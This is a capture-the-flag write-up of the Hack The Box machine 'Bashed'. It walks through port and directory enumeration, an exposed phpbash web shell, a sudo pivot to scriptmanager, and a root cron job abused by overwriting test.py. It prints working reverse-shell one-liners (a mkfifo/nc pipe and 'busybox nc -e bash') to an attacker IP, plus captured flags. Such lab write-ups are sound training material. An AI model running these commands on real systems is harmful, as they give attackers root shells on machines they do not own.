Bashed
Nmap Enumeration
Quick Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| ┌──(wzwr㉿kali)-[~/Documents/htb/bashed]
└─$ sudo nmap -sT -Pn -T4 -vv 10.10.10.68
[sudo] password for wzwr:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-17 02:20 CDT
Initiating Parallel DNS resolution of 1 host. at 02:20
Completed Parallel DNS resolution of 1 host. at 02:20, 0.01s elapsed
Initiating Connect Scan at 02:20
Scanning 10.10.10.68 [1000 ports]
Discovered open port 80/tcp on 10.10.10.68
Completed Connect Scan at 02:20, 11.68s elapsed (1000 total ports)
Nmap scan report for 10.10.10.68
Host is up, received user-set (0.17s latency).
Scanned at 2025-04-17 02:20:44 CDT for 12s
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON
80/tcp open http syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 11.71 seconds
|
Full Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| ┌──(wzwr㉿kali)-[~/Documents/htb/bashed]
└─$ sudo nmap -sT -Pn -T4 -vv -p- 10.10.10.68
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-17 02:21 CDT
Initiating Parallel DNS resolution of 1 host. at 02:21
Completed Parallel DNS resolution of 1 host. at 02:21, 0.00s elapsed
Initiating Connect Scan at 02:21
Scanning 10.10.10.68 [65535 ports]
Discovered open port 80/tcp on 10.10.10.68
Increasing send delay for 10.10.10.68 from 0 to 5 due to max_successful_tryno increase to 5
Connect Scan Timing: About 6.00% done; ETC: 02:30 (0:08:06 remaining)
Connect Scan Timing: About 13.89% done; ETC: 02:29 (0:06:18 remaining)
Connect Scan Timing: About 22.07% done; ETC: 02:28 (0:05:21 remaining)
Connect Scan Timing: About 30.33% done; ETC: 02:28 (0:04:38 remaining)
Connect Scan Timing: About 38.33% done; ETC: 02:28 (0:04:03 remaining)
Connect Scan Timing: About 46.64% done; ETC: 02:28 (0:03:27 remaining)
Connect Scan Timing: About 54.47% done; ETC: 02:28 (0:02:56 remaining)
Connect Scan Timing: About 62.20% done; ETC: 02:28 (0:02:26 remaining)
Connect Scan Timing: About 70.18% done; ETC: 02:28 (0:01:55 remaining)
Increasing send delay for 10.10.10.68 from 5 to 10 due to max_successful_tryno increase to 6
Connect Scan Timing: About 77.35% done; ETC: 02:28 (0:01:34 remaining)
Connect Scan Timing: About 83.43% done; ETC: 02:29 (0:01:12 remaining)
Connect Scan Timing: About 89.21% done; ETC: 02:29 (0:00:49 remaining)
Completed Connect Scan at 02:29, 476.46s elapsed (65535 total ports)
Nmap scan report for 10.10.10.68
Host is up, received user-set (0.14s latency).
Scanned at 2025-04-17 02:21:52 CDT for 477s
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON
80/tcp open http syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 476.49 seconds
|
HTTP Enumeration
Gobuster Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| ┌──(wzwr㉿kali)-[~]
└─$ gobuster dir -u http://10.10.10.68/ -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.68/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 295]
/.htaccess (Status: 403) [Size: 295]
/css (Status: 301) [Size: 308] [--> http://10.10.10.68/css/]
/dev (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/]
/fonts (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/]
/images (Status: 301) [Size: 311] [--> http://10.10.10.68/images/]
/js (Status: 301) [Size: 307] [--> http://10.10.10.68/js/]
/php (Status: 301) [Size: 308] [--> http://10.10.10.68/php/]
/server-status (Status: 403) [Size: 299]
/uploads (Status: 301) [Size: 312] [--> http://10.10.10.68/uploads/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| ┌──(wzwr㉿kali)-[~]
└─$ curl 10.10.10.68 -v
* Trying 10.10.10.68:80...
* Connected to 10.10.10.68 (10.10.10.68) port 80
> GET / HTTP/1.1
> Host: 10.10.10.68
> User-Agent: curl/8.8.0
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Thu, 17 Apr 2025 07:03:54 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Last-Modified: Mon, 04 Dec 2017 23:03:42 GMT
< ETag: "1e3f-55f8bbac32f80"
< Accept-Ranges: bytes
< Content-Length: 7743
< Vary: Accept-Encoding
< Content-Type: text/html
<
|
Source code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
| <!DOCTYPE HTML>
<html lang="en-US">
<head>
<title>Arrexel's Development Site</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="description" content="Template by Colorlib" />
<meta name="keywords" content="HTML, CSS, JavaScript, PHP" />
<meta name="author" content="Colorlib" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<link rel="shortcut icon" href="images/favicon.png" />
<link href='http://fonts.googleapis.com/css?family=Montserrat:400,700%7CLibre+Baskerville:400,400italic,700' rel='stylesheet' type='text/css'>
<link rel="stylesheet" type="text/css" href='css/clear.css' />
<link rel="stylesheet" type="text/css" href='css/common.css' />
<link rel="stylesheet" type="text/css" href='css/font-awesome.min.css' />
<link rel="stylesheet" type="text/css" href='css/carouFredSel.css' />
<link rel="stylesheet" type="text/css" href='css/sm-clean.css' />
<link rel="stylesheet" type="text/css" href='style.css' />
<!--[if lt IE 9]>
<script src="js/html5.js"></script>
<![endif]-->
</head>
<body class="home blog">
<!-- Preloader Gif -->
<table class="doc-loader">
<tbody>
<tr>
<td>
<img src="images/ajax-document-loader.gif" alt="Loading...">
</td>
</tr>
</tbody>
</table>
<!-- Left Sidebar -->
<div id="sidebar" class="sidebar">
<div class="menu-left-part">
<div class="search-holder">
<label>
<input type="search" class="search-field" placeholder="Type here to search..." value="" name="s" title="Search for:">
</label>
</div>
<div class="site-info-holder">
<h1 class="site-title">Arrexel's Development Site</h1>
<p class="site-description">
News and information about my latest development work.
</p>
</div>
<nav id="header-main-menu">
<ul class="main-menu sm sm-clean">
<li><a href="index.html" class="current">Home</a></li>
</ul>
</nav>
<footer>
<div class="footer-info">
© 2018 SUPPABLOG HTML TEMPLATE. <br> CRAFTED WITH <i class="fa fa-heart"></i> BY <a href="https://colorlib.com">COLORLIB</a>.
</div>
</footer>
</div>
<div class="menu-right-part">
<div class="logo-holder">
<a href="index.html">
<img src="images/logo.png" alt="Suppablog WP">
</a>
</div>
<div class="toggle-holder">
<div id="toggle">
<div class="menu-line"></div>
</div>
</div>
<div class="social-holder">
<div class="social-list">
<a href="#"><i class="fa fa-twitter"></i></a>
<a href="#"><i class="fa fa-youtube-play"></i></a>
<a href="#"><i class="fa fa-facebook"></i></a>
<a href="#"><i class="fa fa-vimeo"></i></a>
<a href="#"><i class="fa fa-behance"></i></a>
<a href="#"><i class="fa fa-rss"></i></a>
</div>
</div>
<div class="fixed scroll-top"><i class="fa fa-caret-square-o-up" aria-hidden="true"></i></div>
</div>
<div class="clear"></div>
</div>
<!-- Home Content -->
<div id="content" class="site-content">
<div id="blog-wrapper">
<div class="blog-holder center-relative">
<article id="post-1" class="blog-item-holder featured-post">
<div class="entry-content relative">
<div class="content-1170 center-relative">
<div class="cat-links">
<ul>
<li>
<a href="#">Development</a>
</li>
</ul>
</div>
<div class="entry-date published">December 4, 2017</div>
<h2 class="entry-title">
<a href="single.html">phpbash</a>
</h2>
<div class="excerpt">
<a href="https://github.com/Arrexel/phpbash" target="_blank">phpbash</a> helps a lot with pentesting. I have tested it on multiple different servers and it was very useful. I actually developed it on this exact server!<a class="read-more" href="single.html"></a>
</div>
<div class="clear"></div>
</div>
</div>
</article>
<article id="post-2" class="blog-item-holder">
<div class="entry-content relative">
<div class="content-1170 center-relative">
<h2 class="entry-title">
<a href="single.html">phpbash</a>
</h2>
<div class="cat-links">
<ul>
<li>
<a href="#">Development</a>
</li>
</ul>
</div>
<div class="entry-date published">December 4, 2017</div>
<div class="clear"></div>
</div>
</div>
</article>
</div>
<div class="clear"></div>
<div class="block load-more-holder">LOAD MORE ENTRIES</div>
</div>
<div class="featured-image-holder">
<div class="featured-post-image" style="background-image: url(demo-images/bg.jpg)"></div>
</div>
<div class="clear"></div>
</div>
<!--Load JavaScript-->
<script type="text/javascript" src="js/jquery.js"></script>
<script type='text/javascript' src='js/imagesloaded.pkgd.js'></script>
<script type='text/javascript' src='js/jquery.nicescroll.min.js'></script>
<script type='text/javascript' src='js/jquery.smartmenus.min.js'></script>
<script type='text/javascript' src='js/jquery.carouFredSel-6.0.0-packed.js'></script>
<script type='text/javascript' src='js/jquery.mousewheel.min.js'></script>
<script type='text/javascript' src='js/jquery.touchSwipe.min.js'></script>
<script type='text/javascript' src='js/jquery.easing.1.3.js'></script>
<script type='text/javascript' src='js/main.js'></script>
</body>
</html>
|
By searching colorlib in google, I found that it is wordpress theme, thus we can suspect the website is built by wordpress.
PHPBash
Note that we found a endpoint /dev in gobuster, we can try to enumerate it and I found this:
By visiting phpbash.php , we get a free bash…?
by looking for user.txt, we found it is under /home/arrexel , and succesfully read it!
1
2
3
4
5
6
7
8
9
10
11
12
13
| www-data@bashed
:/var/www/html/dev# ls /home
arrexel
scriptmanager
www-data@bashed
:/var/www/html/dev# ls /home/arrexel
user.txt
www-data@bashed
:/var/www/html/dev# cat /home/arrexel/user.txt
ff3dddc2a315573efb46e61970d7fae5
|
Privilege Escalation
Sudo Permission Check
We found that we can execute sudo without password:
1
2
3
4
5
6
7
8
| www-data@bashed
:/home# sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
|
However, if we directly run it, we will met the following problems:
1
2
3
4
| www-data@bashed
:/home# sudo ls
sudo: no tty present and no askpass program specified
|
We may need to figure out escape the jail and obtain a reverse shell in order to obtain tty. However, after some researching, i finally knows that we need to add -u flag to specify scriptmanager to use its permission…
1
2
| sudo -u scriptmanager id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
|
Then using busybox reverse shell, we get the shell of scriptmanager
Writable Files Enumeration
After we obtain the shell of scriptmanager, we need to do information gathering again. By searching the files we can write, I found the special file :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| find / -writable -type f 2>/dev/null
/scripts/test.py
/home/scriptmanager/.profile
/home/scriptmanager/.bashrc
/home/scriptmanager/.bash_history
/home/scriptmanager/.bash_logout
/sys/fs/cgroup/memory/cgroup.event_control
/sys/kernel/security/apparmor/policy/.remove
/sys/kernel/security/apparmor/policy/.replace
/sys/kernel/security/apparmor/policy/.load
/sys/kernel/security/apparmor/.remove
/sys/kernel/security/apparmor/.replace
/sys/kernel/security/apparmor/.load
/sys/kernel/security/apparmor/.ns_name
/sys/kernel/security/apparmor/.ns_level
/sys/kernel/security/apparmor/.ns_stacked
/sys/kernel/security/apparmor/.stacked
/sys/kernel/security/apparmor/.access
...
/var/www/html/uploads/index.html
|
By looking the directory:
1
2
3
4
5
6
| ls -la /scripts
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Jun 2 2022 .
drwxr-xr-x 23 root root 4096 Jun 2 2022 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 Apr 17 00:52 test.txt
|
and check the test.py content:
1
2
3
| f = open("test.txt", "w")
f.write("testing 123!")
f.close
|
It seems like some process (maybe crontab job i miss it?) would execute our test.py as root. We can rewrite the test.py to obtain the flag of root
1
| echo "import os; os.system('cp /root/root.txt /tmp/root.txt && chmod 777 /tmp/root.txt')" > /scripts/test.py
|
and wait for several minutes and we will get the readable root flag in /tmp/root.txt!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| ls -la /tmp
total 44
drwxrwxrwt 10 root root 4096 Apr 17 00:57 .
drwxr-xr-x 23 root root 4096 Jun 2 2022 ..
drwxrwxrwt 2 root root 4096 Apr 16 23:55 .ICE-unix
drwxrwxrwt 2 root root 4096 Apr 16 23:55 .Test-unix
drwxrwxrwt 2 root root 4096 Apr 16 23:55 .X11-unix
drwxrwxrwt 2 root root 4096 Apr 16 23:55 .XIM-unix
drwxrwxrwt 2 root root 4096 Apr 16 23:55 .font-unix
drwxrwxrwt 2 root root 4096 Apr 16 23:55 VMwareDnD
-rwxrwxrwx 1 root root 33 Apr 17 00:57 root.txt
drwx------ 3 root root 4096 Apr 16 23:55 systemd-private-8de6b7255d9f4785a3e858845c29678b-systemd-timesyncd.service-sqkRWG
drwx------ 2 root root 4096 Apr 16 23:56 vmware-root
cat /tmp/root.txt
aa525d5248662972881e3faa0d509e93
|
Bonus (Reverse Shell)
1
| echo "import os; os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.9 28787 >/tmp/f');" > /scripts/test.py
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| ┌──(wzwr㉿kali)-[~/Documents/htb/bashed]
└─$ nc -lvnp 28787
listening on [any] 28787 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.68] 56756
bash: cannot set terminal process group (1566): Inappropriate ioctl for device
bash: no job control in this shell
root@bashed:/scripts# ls
ls
test.py
test.txt
root@bashed:/scripts# whoami
whoami
root
root@bashed:/scripts# cat /root/root.txt
cat /root/root.txt
aa525d5248662972881e3faa0d509e93
|
Bonus (check what is executing test.py)
1
2
3
| root@bashed:/scripts# crontab -l
crontab -l
* * * * * cd /scripts; for f in *.py; do python "$f"; done
|
Busybox
By testing few payload on reverse shell generator, i found that busybox are working:
1
| busybox nc 10.10.16.9 58787 -e bash
|
1
2
3
4
5
6
7
8
9
10
11
12
13
| ┌──(wzwr㉿kali)-[~/Documents/htb/bashed]
└─$ nc -lnvp 58787
listening on [any] 58787 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.68] 58174
ls
arrexel
scriptmanager
ls
arrexel
scriptmanager
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
Crontab Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
| www-data@bashed
:/# ls -lah /etc/cron*
-rw-r--r-- 1 root root 722 Apr 5 2016 /etc/crontab
/etc/cron.d:
total 20K
drwxr-xr-x 2 root root 4.0K Jun 2 2022 .
drwxr-xr-x 89 root root 4.0K Jun 2 2022 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rw-r--r-- 1 root root 670 Mar 1 2016 php
-rw-r--r-- 1 root root 191 Dec 4 2017 popularity-contest
/etc/cron.daily:
total 48K
drwxr-xr-x 2 root root 4.0K Jun 2 2022 .
drwxr-xr-x 89 root root 4.0K Jun 2 2022 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 539 Apr 5 2016 apache2
-rwxr-xr-x 1 root root 1.5K Jan 17 2017 apt-compat
-rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils
-rwxr-xr-x 1 root root 1.6K Nov 26 2015 dpkg
-rwxr-xr-x 1 root root 372 May 5 2015 logrotate
-rwxr-xr-x 1 root root 1.3K Nov 6 2015 man-db
-rwxr-xr-x 1 root root 435 Nov 17 2014 mlocate
-rwxr-xr-x 1 root root 249 Nov 12 2015 passwd
-rwxr-xr-x 1 root root 3.4K Feb 26 2016 popularity-contest
/etc/cron.hourly:
total 12K
drwxr-xr-x 2 root root 4.0K Jun 2 2022 .
drwxr-xr-x 89 root root 4.0K Jun 2 2022 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
/etc/cron.monthly:
total 12K
drwxr-xr-x 2 root root 4.0K Jun 2 2022 .
drwxr-xr-x 89 root root 4.0K Jun 2 2022 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
/etc/cron.weekly:
total 20K
drwxr-xr-x 2 root root 4.0K Jun 2 2022 .
drwxr-xr-x 89 root root 4.0K Jun 2 2022 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
-rwxr-xr-x 1 root root 771 Nov 6 2015 man-db
|
